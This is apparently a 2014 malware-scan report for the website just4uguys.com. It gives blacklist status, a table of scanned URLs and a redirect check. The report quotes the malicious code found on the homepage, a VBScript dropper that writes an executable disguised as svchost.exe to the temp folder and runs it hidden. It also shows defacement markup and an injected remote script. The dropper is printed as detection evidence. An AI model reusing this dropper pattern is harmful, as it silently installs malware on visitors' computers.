Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=just4uguys.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://just4uguys.com/ | 200 OK Content-Length: 128629 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: Hacked by Antidote ...[1837 bytes skipped]... tb5_stsmsg; n++; } tb5_timerID = setTimeout("tb5_init("+n+")", tb5_sp); } function tb5_randomizetitle(){ tb5_init(0); } tb5_randomizetitle(); </script> <meta name="robots" content="index, follow"> <link rel="SHORTCUT ICON" href="https://cdn1.iconfinder.com/data/icons/zoomeyed-creatures_2/128/freebsd.png"/> <meta name="description" content="Hacked by Antidote"/> <meta name="googlebot" content="index,follow"/> <meta name="robots" content="all"/> <meta name="robots schedule" content="auto"/> <meta name="distribution" content="global"/> <base target='_blank'/> <script src="http://masterendi.googlecode.com/files/salju.js"></script> </head> <meta name="description" content="Antidote" /> <meta ...[127356 bytes skipped]... | ||
http://masterendi.googlecode.com/files/salju.js | 403 Forbidden Content-Length: 2151 Content-Type: text/html | clean |
http://masterendi.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://masterendi.googlecode.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://just4uguys.com//www.google.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 20 Sep 2014 10:59:00 GMT Pragma: no-cache Location: http://just4uguys.com/www.google.com/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=e580b5b14b2ecffafbf309d42f4633af; path=/ X-Pingback: http://just4uguys.com/xmlrpc.php | clean |
http://just4uguys.com/www.google.com/ | 404 Not Found Content-Length: 14319 Content-Type: text/html | clean |
http://just4uguys.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://just4uguys.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://just4uguys.com/wp-content/themes/covertstorebuilder/js/jquery.simplemodal.1.4.4.min.js?ver=1.4.4 | 200 OK Content-Length: 9692 Content-Type: application/javascript | clean |
http://just4uguys.com/wp-content/themes/covertstorebuilder/js/bootstrap.js?ver=1.7 | 200 OK Content-Length: 3544 Content-Type: application/javascript | clean |
http://just4uguys.com/wp-content/themes/covertstorebuilder/js/script.js?ver=1.7 | 200 OK Content-Length: 4312 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://just4uguys.com/wp-login.php?action=register | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://just4uguys.com/wp-login.php | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://just4uguys.com/category/apps/ | 200 OK Content-Length: 18216 Content-Type: text/html | clean |
http://just4uguys.com/category/iphones/ | 200 OK Content-Length: 13358 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: just4uguys.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Sep 2014 10:58:54 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 128629
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 10 Sep 2014 20:36:26 GMT
...128629 bytes of data.
GET / HTTP/1.1
Host: just4uguys.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Sep 2014 10:58:54 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 128629
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 10 Sep 2014 20:36:26 GMT
...128629 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: just4uguys.com
Referer: http://www.google.com/search?q=just4uguys.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: just4uguys.com
Referer: http://www.google.com/search?q=just4uguys.com
Result:
The result is similar to the first query. There are no suspicious redirects found.